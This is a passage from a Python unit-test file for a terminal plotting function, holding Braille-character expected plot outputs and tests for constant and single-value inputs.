2.05000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.96000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.87000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.78000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.69000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.60000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.42000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.33000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.24000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.15000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.06000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.97000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.88000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.79000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.70000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5, 0.5], [1, 4]))
assert expected == plot([0.5, 0.5], [1, 4])
def test_constant_x_y():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5, 0.5], [0.5, 0.5]))
assert expected == plot([0.5, 0.5], [0.5, 0.5])
def test_single_value():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
